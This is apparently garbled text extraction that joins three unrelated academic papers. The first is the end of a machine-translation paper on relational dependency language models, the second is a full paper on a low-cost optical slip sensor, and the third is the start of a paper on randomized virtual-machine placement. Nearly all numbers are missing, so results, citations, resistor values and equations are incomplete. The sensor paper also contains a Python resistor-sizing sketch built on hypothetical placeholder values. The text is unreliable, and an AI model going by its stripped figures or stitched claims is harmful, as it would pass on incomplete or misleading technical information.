forms the baseline for all metrics and test sets. tun- ing on bleu+hwcmf results in further improve- ments in hwcmf and ter. looking at the com- bined effect of adding rdlm and changing the tun- ing objective, we observe gains in bleu by . – . points, and gains in hwcmf by . – . points. . morphological agreement we argue that the dependency language models and hwcmf as a tuning metric improve grammatical- ity, and we are able to quantify one aspect thereof, morphological agreement, for english→german. williams and koehn ( ) introduce a unification grammar with hand-crafted agreement constraints to identify and suppress selected morphological agree- ment violations in german, namely in regards to noun phrase agreement, prepositional phrase agree- ment, and subject-verb agreement. 
we can use their grammar to analyse the effect of different models on morphological agreement by counting the number of translations that violate at least one agreement con- straint. we assume that the number of false posi- system mira objective bleu bleu+hwcmf baseline -gram nnlm shen et al. ( ) dlm rdlm -gram + rdlm table : number of english→german translation hy- potheses with at least one agreement error according to unification grammar (williams and koehn, ) on newstest ( sentences). average of three mira runs. tives (i.e. correct analyses that trigger an agreement violation) remains roughly constant throughout all systems, so that a reduction in the number of agree- ment violations is an indicator of better grammatical agreement. table shows the results. while the -gram nnlm reduces the number of agreement errors somewhat compared to the baseline (- %), the reduction is greater for dlm (- %) and rdlm (- %). neither the baseline nor the -gram nnlm profits strongly from tuning on hwcmf , while the number of agreement errors is further reduced for the system with dlm (- %) and rdlm (- %). adding the -gram nnlm to the rdlm system yields no further reduction on the number of agree- ment errors. enforcing the agreement constraints on the base- line system (tuned on bleu+hwcmf ) provides us with a gain of . in both bleu and hwcmf ; on the rdlm system, only . . the fact that the ben- efit of enforcing the agreement constraints drops off more sharply than the number of constraint viola- tions indicates that the remaining violations tend to be harder for the model to correct, e.g. because the translation model has not learned to produce the re- quired inflection of a word, or because some of the remaining violations are false positives. while the dependency language models’ effect of improving morphological agreement is not (fully) cumulative with the benefit from enforcing the unification con- straints formulated by williams and koehn ( ), our model has the advantage of being language- independent, learning from the data itself rather than relying on manually developed, grammar-specific constraints, and covering a wider range of phenom- ena such as subcategorisation and syntactic colloca- tions. the results confirm that the rdlm is more ef- fective at reducing morphological agreement errors than a similarly trained n-gram nnlm and the unla- belled dlm, and that adding hwcmf to the train- ing objective is beneficial. on a a meta-evaluation level, we compare the rank correlation between the automatic metrics and the numer of agreement er- rors with kendall’s τ correlation, and observe that he number of agreement errors is more strongly (nega- tively) correlated with hwcmf (τ = − . ) than with bleu (τ = − . ), meteor (τ = − . ) or ter (τ = . ). this supports our theoretical expectation that hwcmf is more sensitive to mor- phological agreement, which is enforced along syn- tactic n-grams, than n-gram metrics such as bleu, or the unigram metric meteor. related work while there has been a wide range of dependency language models proposed (e.g. (chelba et al., ; quirk et al., ; shen et al., ; zhang, ; popel and marecek, )), there are vast differ- ences in modelling assumptions. our work is most similar to the dependency language model described in shen et al. ( ), or the h-gram model proposed by zhang ( ), both of which have been used for smt. we make different modelling assumptions, relying less on configurational information, but in- cluding the prediction of dependency labels in the model. 
we argue that our relational modelling as- sumptions are more suitable for languages with a relatively free word order such as german. to a lesser extent, our work is similar to other parsing models that have been used for language modelling, such as lexicalized pcfgs (charniak, ; collins, ; charniak et al., ), or struc- tured language models (chelba and jelinek, ); previous efforts to include them in the translation process failed to improve translation performance (och et al., ; post and gildea, ). differ- ences in our work that could explain why we see im- provements include the use of neural networks for training the model on the automatically parsed train- ing text, instead of re-using existing parser mod- els, which could be seen as a form of self-training (mcclosky et al., ), and the integration of the language model into the decoder instead of n-best reranking. also, there are major differences in the parsing models themselves. for instance, note that the structured lm by chelba and jelinek ( ) uses a binary branching structure, and that complex label sets would be required to encode subcategorisation frames in binary trees (hockenmaier and steedman, ). our neural network is a standard feed-forward neural network as introduced by bengio et al. ( ). recently, recursive neural networks have been proposed for syntactic parsing (socher et al., ; le and zuidema, ). the recursive na- ture of such models allows for the encoding of more context; for an efficient integration into the dynamic programming search of smt decoding, we deem our model, which makes stronger markov assump- tions, more suitable. while bleu has been the standard objective func- tion for tuning the log-linear parameters in smt sys- tems, recent work has investigated alternative objec- tive functions. some authors concluded that none of the tested alternatives could consistently outperform bleu (cer et al., ; callison-burch et al., ). liu et al. ( ) report that tuning on the tesla metric gives better results than tuning on bleu; lo et al. ( ) do the same for meant. there is related work on improving morpholog- ical agreement and subcategorisation through post- editing (rosa et al., ) or independent models for inflection generation (toutanova et al., ; weller et al., ). the latter models initially pro- duce a stemmed translation, then predict the inflec- tion through feature-rich sequence models. such a pipeline of prediction steps is less powerful than our joint prediction of stems and inflection. for in- stance, in example in table , our model chooses a different stem to match the subcategorisation frame of the translation; it is not possible to fix the baseline translation with inflection changes alone. conclusion the main contribution of this paper is the description of a relational dependency language model. we show that it is a valuable asset to a state-of-the-art smt system by comparing perplexity values with other types of languages models, and by its integra- tion into decoding, which results in improvements according to automatic mt metrics and reduces the number of agreement errors. we show that the dis- fluencies that our model captures are qualitatively different from an n-gram neural network language model, with our model being more effective at mod- elling fluency phenomena along syntactic n-grams. a second important contribution is the optimiza- tion of the log-linear parameters of an smt sys- tem based on syntactic n-grams. 
we are to our knowledge the first to tune an smt system on a non-shallow syntactic similarity metric. apart from showing improvements by tuning on hwcmf , our results also shed light on the interaction between models and tuning metrics. with n-gram language models, the choice of tuning metric only had a small effect on the english→german translation results. only with dependency language models, which are able to model the syntactic n-grams that hwcm scores, did we see large improvements from adding we have released an implementation of rdlm and tuning on hwcmf as part of the moses decoder. hwcmf to the objective function. on the one hand, this has implications when evaluating new model components: using an objective function that can- not capture the impact of a model component can result in false negatives because the model compo- nent will not receive an appropriate weight, and the model may thus seem to be of little use, even in a human evaluation. on the other hand, it is an im- portant finding for the evaluation of objective func- tions: the performance of an objective function is tied to the power of the underlying model. without a model that is able to model syntactic n-grams, we might have concluded that hwcm is of little help as an objective function. now, we hypothesize that hwcm is well-suited to optimize dependency lan- guage models because both operate on syntactic n- grams, just like bleu and n-gram models are natu- ral counterparts. the approach we present is language- independent, and we evaluated it on smt into german and russian. while we have no empirical data on the model’s effectiveness for other target languages, we suspect that syntactic n-grams are especially suited for modelling and evaluating translations into languages with inter-dependencies between distant words and relatively free word order, such as german, czech, or russian. in this work, we relied on parse hypotheses being provided by a string-to-tree smt decoder, but other settings are conceivable for future work, such as per- forming n-best string reranking by coupling the rela- tional dependency lm with a monolingual parse al- gorithm. another obvious extension of the relational dependency lm is the inclusion of more context, for instance through larger windows for siblings and an- cestors, or source-context as in (devlin et al., ). also, we believe that the model can benefit from further advances in neural network modelling, for instance recent findings that ensembles of networks outperform a single network (mikolov et al., ; devlin et al., ) acknowledgements i thank bonnie webber and the anonymous review- ers for their helpful suggestions and feedback. this research was funded by the swiss national science foundation under grant p zhp _ . references satanjeev banerjee and alon lavie. . meteor: an automatic metric for mt evaluation with im- proved correlation with human judgments. in pro- ceedings of the acl workshop on intrinsic and ex- trinsic evaluation measures for machine transla- tion and/or summarization, pages – , ann arbor, michigan. association for computational linguistics. yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. j. mach. learn. res., : – , march. ondrej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint- amand, radu soricut, lucia specia, and aleš tam- chyna. . findings of the workshop on sta- tistical machine translation. 
in proceedings of the ninth workshop on statistical machine translation, pages – , baltimore, maryland, usa. association for computational linguistics. chris callison-burch, philipp koehn, christof monz, and omar zaidan. . findings of the work- shop on statistical machine translation. in proceed- ings of the sixth workshop on statistical machine translation, pages – , edinburgh, scotland. asso- ciation for computational linguistics. daniel cer, christopher d. manning, and daniel juraf- sky. . the best lexical metric for phrase-based statistical mt system optimization. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, hlt ’ , pages – , los angeles, california. association for computa- tional linguistics. eugene charniak, kevin knight, and kenji yamada. . syntax-based language models for statistical machine translation. in mt summit ix, new orleans, usa. eugene charniak. . immediate-head parsing for language models. in proceedings of the th annual meeting on association for computational linguis- tics, acl ’ , pages – . association for com- putational linguistics. ciprian chelba and frederick jelinek. . structured language modeling. computer speech & language, ( ): – . ciprian chelba, david engle, frederick jelinek, vic- tor jimenez, sanjeev khudanpur, lidia mangu, harry printz, eric ristad, ronald rosenfeld, andreas stol- cke, and dekai wu. . structure and performance of a dependency language model. in proceedings of eurospeech, pages – . colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of the conference of the north amer- ican chapter of the association for computational linguistics: human language technologies, naacl hlt ’ , pages – , montreal, canada. associa- tion for computational linguistics. jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer insta- bility. in proceedings of the th annual meeting of the association for computational linguistics, pages – , portland, oregon. association for computa- tional linguistics. michael collins. . head-driven statistical mod- els for natural language parsing. computational lin- guistics, : – . michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and evaluation of machine translation systems. in pro- ceedings of the sixth workshop on statistical machine translation, pages – , edinburgh, scotland. asso- ciation for computational linguistics. jacob devlin, rabih zbib, zhongqiang huang, thomas lamar, richard schwartz, and john makhoul. . fast and robust neural network joint models for sta- tistical machine translation. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland. association for computational linguistics. julia hockenmaier and mark steedman. . gen- erative models for statistical parsing with combina- tory categorial grammar. in proceedings of the th annual meeting of the association for computational linguistics, pages – , philadelphia, pa, usa. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. 
in pro- ceedings of the acl- demo and poster sessions, pages – , prague, czech republic. association for computational linguistics. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar. associa- tion for computational linguistics. ding liu and daniel gildea. . syntactic features for evaluation of machine translation. in proceed- ings of the acl workshop on intrinsic and extrinsic evaluation measures for machine translation and/or summarization, pages – , ann arbor, michigan. chang liu, daniel dahlmeier, and hwee tou ng. . better evaluation metrics lead to better machine translation. in proceedings of the conference on empirical methods in natural language process- ing, pages – , edinburgh, uk. chi-kiu lo, meriem beloucif, and dekai wu. . im- proving machine translation into chinese by tuning against chinese meant. in th international work- shop on spoken language translation (iwslt ), heidelberg, germany. david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in pro- ceedings of the main conference on human language technology conference of the north american chap- ter of the association of computational linguistics, hlt-naacl ’ , pages – , new york. asso- ciation for computational linguistics. tomas mikolov, stefan kombrink, lukas burget, jan cernocký, and sanjeev khudanpur. . exten- sions of recurrent neural network language model. in proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp , pages – , prague, czech republic. joakim nivre, johan hall, and jens nilsson. . malt- parser: a data-driven parser-generator for depen- dency parsing. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – , genoa, italy. franz josef och, daniel gildea, sanjeev khudanpur, anoop sarkar, kenji yamada, alex fraser, shankar kumar, libin shen, david smith, katherine eng, viren jain, zhen jin, and dragomir radev. . a smorgasbord of features for statistical machine translation. in proceedings of the main conference on human language technology conference of the north american chapter of the association of com- putational linguistics, pages – , boston, mas- sachusetts, usa. association for computational lin- guistics. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of the th annual meeting on association for compu- tational linguistics, pages – , philadelphia, pa. association for computational linguistics. jan-thorsten peter, matthias huck, hermann ney, and daniel stein. . soft string-to-dependency hierarchical machine translation. in informatik- tage der gesellschaft für informatik, lecture notes in informatics (lni), pages – , bonn, germany. gesellschaft für informatik. martin popel and david marecek. . perplexity of n-gram and dependency language models. in petr sojka, ales horák, ivan kopecek, and karel pala, edi- tors, tsd, volume of lecture notes in computer science, pages – . springer. matt post and daniel gildea. . parsers as language models for statistical machine translation. in proceed- ings of the eighth conference of the association for machine translation in the americas. chris quirk, arul menezes, and colin cherry. . dependency tree translation: syntactically informed phrasal smt. 
technical report msr-tr- - , microsoft research. rudolf rosa, david mareček, and ondřej dušek. . depfix: a system for automatic correction of czech mt outputs. in proceedings of the seventh workshop on statistical machine translation, wmt ’ , pages – , montreal, canada. association for computational linguistics. rico sennrich, martin volk, and gerold schneider. . exploiting synergies between open resources for german dependency parsing, pos-tagging, and mor- phological analysis. in proceedings of the interna- tional conference recent advances in natural lan- guage processing , pages – , hissar, bul- garia. rico sennrich. . a cyk+ variant for scfg decod- ing without a dot chart. in proceedings of ssst- , eighth workshop on syntax, semantics and structure in statistical translation, pages – , doha, qatar, october. association for computational linguistics. serge sharoff and joakim nivre. . the proper place of men and machines in language technology. process- ing russian without any linguistic knowledge. in pro- ceedings of the international conference on compu- tational linguistics and artificial intelligence dialog . libin shen, jinxi xu, and ralph weischedel. . string-to-dependency statistical machine translation. comput. linguist., ( ): – . grigori sidorov, francisco velasquez, efstathios sta- matatos, alexander gelbukh, and liliana chanona- hernández. . syntactic dependency-based n- grams as classification features. in proceedings of the th mexican international conference on ad- vances in computational intelligence - volume part ii, micai’ , pages – , berlin, heidelberg. springer- verlag. matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of association for machine translation in the americas, pages – . richard socher, christopher d. manning, and andrew y. ng. . learning continuous phrase represen- tations and syntactic parsing with recursive neural networks. proceedings of the deep learning and un- supervised feature learning workshop of nips , pages – . andreas stolcke. . srilm – an extensible lan- guage modeling toolkit. in seventh international conference on spoken language processing, pages – , denver, colorado, usa. kristina toutanova, hisami suzuki, and achim ruopp. . applying morphology generation models to machine translation. in proceedings of the th an- nual meeting of the association for computational linguistics. reut tsarfaty, khalil sima’an, and remko scha. . an alternative to head-driven approaches for pars- ing a (relatively) free word-order language. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , singapore. reut tsarfaty. . relational-realizational parsing. ph.d. thesis, university of amsterdam. ashish vaswani, yinggong zhao, victoria fossum, and david chiang. . decoding with large-scale neural language models improves translation. in proceedings of the conference on empirical methods in natural language processing, emnlp , pages – , seattle, washington, usa. marion weller, alexander fraser, and sabine schulte im walde. . using subcategorization knowledge to improve case prediction for translation to german. in proceedings of the st annual meeting of the associ- ation for computational linguistics, pages – , sofia, bulgaria. association for computational lin- guistics. philip williams and philipp koehn. . agreement constraints for statistical machine translation into german. 
in proceedings of the sixth workshop on statistical machine translation, pages – , ed- inburgh, uk. association for computational linguis- tics. philip williams, rico sennrich, maria nadejde, matthias huck, eva hasler, and philipp koehn. . ed- inburgh’s syntax-based systems at wmt . in proceedings of the ninth workshop on statistical ma- chine translation, pages – , baltimore, mary- land, usa. association for computational linguis- tics. joy ying zhang. . structured language models for statistical machine translation. ph.d. thesis, johns hopkins university. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - cheap and simple slip sensor based on the optical sensor feibi liu university of southampton, southampton, uk, so bj e-mail: @qq.com abstract—the purpose of this project is to manufacture a cheap and simple slip sensor. the slip sensor is based on the optical sensor. the experiment divides into two parts, how to build sensor and how to test the features of the sensor. the slip sensor could be divided into three parts, cover, optical sensor and adaptor board, which will connect to the suitable resistors circuit to obtain the large gain. during the test, the participant applies the static state way to measure the relationship between input and output with a white cover and a gray cover. the slip sensor with the white cover has low hysteresis and high repeatability which are better than the gray cover. keywords-slip sensor; optical sensor; force sensor; static state; reflective object sensor i. introduction when humans try to grasp an object, they do not need to know the parameters (like mass) of the object. they just control the force of the hand which ensures the object will not fall by human ‘feeling’. for the robot hand, the slip sensors which fix on the fingertips could give the feedback (it is like human’s feeling) to the cpu which could control the force of the robot hand [ ]. in a sense, the slip sensor is a kind of the force sensor, because the feedback of the slip sensor is related to the force which puts on the surface of slip sensor. only different is the slip sensor focuses on the force changing between the object slipping and not slipping. there are many kinds of methods to build a slip sensor or a force sensor, which bases different theories. at the beginning, luo used piezoresistive strain gauge on the robot links to detect the force and this was used in this field for a long time. however, this structure was a little complex comparing the new ways [ ]. cristina cristalli and michael r neuman designed a kind of force sensor by changing the capacitance in dielectric structure[ ].they used this sensor to measure the blood pressure and gain a good ratio between the input and output. however, in the experiment, they also found that the ratio between the input and output would change a little when they used the same way to build a same standard sensor. the reason is the different stray capacitances in the environment. piezoresistive is very popular in industry and research field because of low cost, small and light-weight. however, piezoresistive exists low repeatability and large hysteresis, which will cause the low accuracy. l.paredes-madrid group improved the accuracy of piezoresistive by modeling the capacitance. nevertheless, they still needed to consider how to reduce the force estimation errors [ ]. lorenzo jamone and his group designed a kind of tactile sensor that based on the hall-effect theory. 
this sensor detected the changing of the magnetic field when the force pushed on the sensor to give a feedback to control. after the experiment, they found this kind of sensor had high sensitivity, low hysteresis, and good repeatability, but the experiment just tested the force on normal component [ ]. samir boukhenous and mokhtar attari also used the hall-effect theory to produce a pinch grip sensor, which had a good response to input and output. however, the experiment also focused on the normal direction [ ]. darko belavic and his group completed an experiment about the low energy consumption of different types of pressure sensors which included the piezoelectric sensor. this piezoelectric sensor was based on the performances of the ferroelectric thick films, which could transform the pressure into shifted resonant frequency of diaphragm which could be regarded as an output signal. they concluded that the piezoelectric resonant sensor was suitable for low energy consumption and the energy consumption was mainly international journal of advanced network, monitoring and controls volume , no. , dependent on materials and structures, but it was not sample work to reduce consumption because of complete relationships between every component in sensor [ ]. shouhei shirafuji and koh hosoda developed a robot hand which combined the strain gauge sensor and piezoelectric polyvingylidenefluoride (pvdf) sensor to measure stresses and detect slipping. the pvdf sensor could detect the variations of the force which was caused by the slipping of the object. however, the pvdf sensor needed the high reactive ability and high resolution to detect the slipping [ ]. a. persichetti, f. vecchi and m. c. carrozza, presented a contact sensor using optical theory, which based on detecting the changes of the light beams intensity. figure showed the structure of this kind of sensor, which included a soft silicone cover, a receiver (a phototransistor) and a transmitter (an infrared photodiode). when the force pressured on the cover, the intensity of the light which reflects the receiver will change. therefore, this sensor has high sensitivity, fast response and could enhance the immunity to noise by adjusting the light intensity from the transmitter [ ]. figure . the structure of the optical sensor for this paper, the participant will utilize the optical theory to build a cheap, simple and low consumption slip sensor. because the photodiode needs to emit high intensity light, the optical sensor will cost high consumption compared with other sensors [ ]. therefore, the participant tried to find a good material which could reduce the loss during reflecting, which could reduce the requirement of the light intensity which is emitted by the photodiode. this could reduce the consumption. for obtaining a good response, the participant also chooses suitable resistors to get large amplifier gain. comparing with an optical sensor which is built by a. persichetti and his friends [ ], the most different in this paper is the participant use cast perspex acrylic sheet to replace silicone (showing figure ) as the cover. because the cast perspex acrylic sheet is harder than silicone, this replacement could increase the robustness of the sensor. however, this also means the slip sensor may sacrifice some sensitivity. ii. methodology the purpose of the experiment is to produce a cheap, simple and low consumption slip sensor. 
therefore, the experiment could be divided into two parts, the first part is to build the slip sensor and the second part is to test the slip sensor as figure . figure . the slip sensor with resistors a. design the slip sensor includes three parts, cover, optical sensor and adapter board. figure shows the slip sensor. therefore, first step, the participant needs to choose a suitable optical sensor. international journal of advanced network, monitoring and controls volume , no. , figure . the slip sensor the qre rg-minature reflective object sensor is used as the optical sensor because it is mini. as figure showing, the photodiode (transmitter) which is between the pin and pin emits the light and the phototransistor (receiver) which will receive the reflected light from the cover is fixed between pin and pin [ ]. figure . the structure of the qre rg sensor second step, the participant needs to produce a suitable cover. the cover is made by the mm thickness clear cast perspex acrylic sheet. there are some advantages to using this material. firstly, the weight is light. secondly, the cost of the material is low. thirdly, it is easy to build which just needs a laser cutter. fourthly, the cast perspex acrylic sheet has high tensile strength and rigidity, so it could protect the optical sensor which is under the cover. fifthly, the clear perspex acrylic could transmit % of the visible light, which is simple to the participant to change the color of the cover and detect the influence of the color of the cover [ ]. figure shows the blueprint of the cover. figure shows the cover after gluing. figure . the cover's blueprint figure . cover third step, solder the optical sensor on the adapter board as the figure . international journal of advanced network, monitoring and controls volume , no. , figure . the optical sensor with adaptor figure . the circuit's schematic structure fourth step, choose the suitable resistors to build the circuit. figure shows the equivalent circuit diagram. rf is used to keep the photodiode (transmitter) working in the ideal voltage range. rc is to amplify the voltage signal. according to the specification of the qre rg, the participant assumes if = . a, which could ensure the photodiode work well at room temperature. figure . forward current vs forward voltage from figure , the forward voltage (vf ) should be about . v. according equation ,rf= Ω.  because the participant wants to get the largest reflection light from the cover, the participant puts a white thin paper on the top of the cover during the test. the distance between the top surface of the cover and the top surface of the optical sensor is about mm. according to the figure , it could easy find that the real collector current ic is . which is half of collector current at distance mm. figure . normalized collector current vs distance between when if = . a and distance is mm, the collector current is around . ma in according specification, so the real collector current ic is . ma. assume the collector-emitter voltage (vce) is . v which could get international journal of advanced network, monitoring and controls volume , no. , larger gain. using the equation gets the collector resistor (rc= Ω).  b. test these devices were applied in the experiment. el r power supply ( v and . a);amprobe xr-a multimeter; compression testing machine;mdo b- mixed domain oscilloscope;hmc digital multimeter. figure shows the schematic during testing. 
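the resistor choices in the design step above follow from ohm's law applied to the transmitter and receiver branches of the equivalent circuit just described; a minimal sketch of that calculation is given below. because the supply voltage, forward voltage, forward current, collector current and collector-emitter voltage are not reproduced in the text, every numeric value here is a hypothetical placeholder and must be replaced with the figures read from the sensor's datasheet and the chosen operating point.

# sketch of the resistor sizing for the reflective object sensor (design step four).
# all numbers are hypothetical placeholders, not the paper's elided datasheet values.
V_SUPPLY = 5.0    # assumed supply voltage (v), hypothetical
V_F = 1.2         # assumed photodiode forward voltage (v), hypothetical
I_F = 0.020       # assumed photodiode forward current (a), hypothetical
V_CE = 0.4        # assumed collector-emitter voltage (v), hypothetical
I_C = 0.001       # assumed collector current at the working distance (a), hypothetical

def series_resistor(v_supply, v_drop, current):
    # ohm's law: the resistor drops (v_supply - v_drop) while carrying `current`
    return (v_supply - v_drop) / current

r_f = series_resistor(V_SUPPLY, V_F, I_F)    # transmitter (photodiode) resistor rf
r_c = series_resistor(V_SUPPLY, V_CE, I_C)   # receiver (phototransistor) load resistor rc
print(f"rf ~ {r_f:.0f} ohm, rc ~ {r_c:.0f} ohm")

under these assumptions, a larger rc gives a larger voltage swing for a given change in collector current, which is consistent with the design choice above of assuming a low collector-emitter voltage to obtain a larger gain.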
figure . the assembly schematic first step, the participant put a white paper on the cover to detect the relationship between the force and voltage. because the output voltage was more than v which is exceed the range of the amprobe xr-a multimeter, the second power supply gave v reverse voltage as the offset voltage. second step, the participant put a weight ( n) on compression testing machine and recorded the voltage. third step, repeated step until there were six weights ( n) on the machine. fourth step, took the weight ( n) one by one from the machine and recorded the voltage after each operation. after these steps, one group of data was completed. to obtain stable data, the participant repeated five times of these steps and got five groups of data. next, the participant changed the color of the cover into gray, which just put nothing between the probe and cover, because the probe is in gray. then, used the same way to get five groups of data. the output voltage is not more than v, so the offset voltage does not need. the second power supply is v. iii. result and analyses figure and figure , show the relationship between the output voltage and force using white cover. the trend line in each figure could quantize the relationship between the output and input. the r-square shows on each figure mean the reliability of the trend line. when the value is more near the , the points should more near the trend line. usually, when the value is larger than . , the trend line could predict the relationship between the input and output. in each of figure and figure , the r-square is larger than . , which means the trend line has high predictability. from these two figures, it is easy to find that the coefficients of these two trend lines are close. therefore, the sensor has low hysteresis and high repeatability in white color. the offset voltage is around . v, which is a little high. the reason is that the white color reflects almost light which enhances the power that phototransistor received. figure . meaning of voltage vs force when force is increasing international journal of advanced network, monitoring and controls volume , no. , figure . meaning of voltage vs force when force is reducing figure and figure show the relationship between the output voltage and force using gray cover. however, it is easy to find that the r-square in these two figures is much lower than figure and figure . the reason is that the features of the optical sensor between collector current and distance getting from the specification are based on the white paper. all assumes are also based on that condition, using white paper ( % reflective). therefore, the accuracy of the trend line is low during using gray cover. however, the gain using gray cover (around . ) is two times than the gain using white cover (around . ). the participant speculates one of group data in figure and is not reliable. from the figure and figure , the max output points are much higher than average output points, because one group of the value is much higher than others. this may be caused by hysteresis. nevertheless, to ensure the authenticity of the experiment. the participant still recorded this group of value. figure . meaning of voltage vs force when force is increasing figure . meaning of voltage vs force when force is reducing iv. conclusions during the experiment, the participant used a cheap and simple way to build a slip sensor. 
the participant also found that white cover of the sensor has high repeatability, low hysteresis, and high predictability. however, the gray cover of the sensor has low repeatability and low accuracy. comparing with other slip sensors which use the optical theory, this slip sensor has high robustness. in the test, the participant used static state way to test the feature of the slip sensor, which could obtain the quantized function information between input and output. however, in the future work, the participant could improve the experiment from these two aspects. first one, the participant should try to detect the response of slip sensor in the dynamic state which means the object is slipping on the sensor. second one, the participant should design a black box to control the external light. this could help the participant understand the influence of the light in the environment to the sensor cover and find a high resistance of cover to the external light. references [ ] paul h chappell, darryl p j cotton, andy cranny and neil m white “experimental lead zirconate titanate (pzt) slip sensor”, mec ' measuring success in upper limb prosthetics, aug. [ ] r. luo, “a microcomputer-based intelligent sensor for multiaxis force/torque measurement”, in ieee transactions on industrial electronics, vol. pp. - . february . [ ] c. cristalli and m. r. neuman, “a capacitive pressure sensor for measurement of interfacial pressure between a sphygmomanometer cuff and the arm," engineering in medicine and biology society, international journal of advanced network, monitoring and controls volume , no. , ., ieee th annual conference, montreal, que., , pp. - vol. . [ ] l. paredes-madrid, l. emmi and p. gonzalez de santos, "improving the performance of piezoresistive force sensors by modeling sensor capacitance," ieee international symposium on industrial electronics, bari, , pp. - .doi: . /isie. . [ ] l. jamone, l. natale, g. metta and g. sandini, "highly sensitive soft tactile sensors for an anthropomorphic robotic hand," in ieee sensors journal, vol. , no. , pp. - , aug. . doi: . /jsen. . [ ] s. boukhenous and m. attari, "an easy made pinch grip sensor to quantify fingertip pressure," nd international conference on signals, circuits and systems, monastir, , pp. - . doi: . /icscs. . [ ] d. belavic et al., “low energy consumption thick-_lm pressure sensors," microelectronics and packaging conference, . empc .european, rimini, , pp. - . [ ] s. shirafuji and k. hosoda, “detection and prevention of slip using sensors with different properties embedded in elastic artificial skin on the basis of previous experience," advanced robotics (icar), th international conference on, tallinn, , pp. - . [ ] a. persichetti, f. vecchi and m. c. carrozza, “optoelectronic based flexible contact sensor for prosthetic hand application," ieee th international conference on rehabilitation robotics, noordwijk, , pp. - . [ ] p. h. chappell, “making sense of artificial hands,” journal of medical engineering technology, , vol. [ ] “qre pdf datasheet reflective object sensor”, fairchildsemi.com, . <https://www.fairchildsemi.com/products/optoelectronics/infrared/ref lective-sensors/qre .html?keyword=qre gr.> ( -sep- ). [ ] “perspex design guide - guidance for fabricators and designers. - perspex", perspex.co.uk. <http://www.perspex.co.uk/technical-library/brochures-and-workboo ks/perspex-design-guide/> ( - sep- ). 
randomized routing of virtual machines in iaas data centers randomized routing of virtual machines in iaas data centers hadi khani and hamed khanmirza department of engineering, islamic azad university garmsar branch, garmsar, semnan, iran department of computer engineering, k. n. toosi university of technology, tehran, tehran, iran abstract cloud computing technology has been a game changer in recent years. cloud computing providers promise cost-effective and on-demand resource computing for their users. cloud computing providers are running the workloads of users as virtual machines (vms) in a large-scale data center consisting a few thousands physical servers. cloud data centers face highly dynamic workloads varying over time and many short tasks that demand quick resource management decisions. these data centers are large scale and the behavior of workload is unpredictable. the incoming vm must be assigned onto the proper physical machine (pm) in order to keep a balance between power consumption and quality of service. the scale and agility of cloud computing data centers are unprecedented so the previous approaches are fruitless. we suggest an analytical model for cloud computing data centers when the number of pms in the data center is large. in particular, we focus on the assignment of vm onto pms regardless of their current load. for exponential vm arrival with general distribution sojourn time, the mean power consumption is calculated. then, we show the minimum power consumption under quality of service constraint will be achieved with randomize assignment of incoming vms onto pms. extensive simulation supports the validity of our analytical model. subjects computer networks and communications, optimization theory and computation keywords optimization, cloud computing, placement, energy consumption, service level agreement, virtualization introduction infrastructure-as-a-service (iaas) cloud providers (cps), such as amazon, google and microsoft, have huge data centers to provide on demand virtual machines (vms) to their customers. an important issue for such data centers is to determine the server to which an incoming vm should be placed in order to optimize a given performance criterion. the cp has a variety of challenges, such as higher resource utilization, less cooling expenses and lower operation expenses. fortunately, all of these efficiency metrics are positively correlated. less power consumption means less operational expense, less cooling bills and higher utilization in the data center. this lets us choose the power consumption as the key metric representing others. on the other hand, cloud users who run their applications on vms have their own concerns with quality of service. the resource management of cp has the chance to revise the initial placement of vms onto pms by live migrating techniques or dynamic consolidation. considering live migration, the problem of vm placement can be divided in two parts as pictured in fig. . how to cite this article khani h, khanmirza h. . randomized routing of virtual machines in iaas data centers. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted july published september corresponding author hadi khani, hkhani@ut.ac.ir academic editor lan wang additional information and declarations can be found on page doi . /peerj-cs. copyright khani and khanmirza distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. 
mailto:hkhani@�ut.�ac.�ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ . the routing of arriving vms onto pms . the optimization of the current vm placement by vm migration according to this scenario, a vm request transmitted by a user to the data center is routed to the proper pm in the first step and then its placement can be optimized later. the optimization of the current vm placement in the data center is analogous to the np-hard “bin packing problem.” in this problem, a given set of items of variable size should assigned to the minimum number of bins taken from a given set. the vms experience dynamic workloads, which means that the resource usage by a vm arbitrarily varies over time. in fact, the data center resource manager does not have the complete knowledge of the future resource usage (size) of vms. the placement of vms is monitored continuously and is tuned through the migration procedure. the virtualization technology let vm migrates (moves) between pms on the fly. the migration of vm can be advantageous either when the resources utilization is too low, meaning that the pm is highly underutilized, or when it is too high, possibly causing overload situations and service level agreement violations (slavs). the optimization problem of vm placement problem is so complex that centralized and deterministic solutions are practically useless in large data centers with hundreds or thousands of servers as shown in several researches like (wang & gelenbe, ; shojafar, cordeschi & baccarelli, ; wang, jiang & wu, ). the centralized and deterministic algorithms may be appropriate in data centers with a limited number of servers, but may become inefficient in large and router vms pm pm pm pm|p| ... vm migra�on vm migra�on vm migra�on λ =r λ λ =r λ λ =r λ λ|p|=r|p|λ λ cloud data center figure 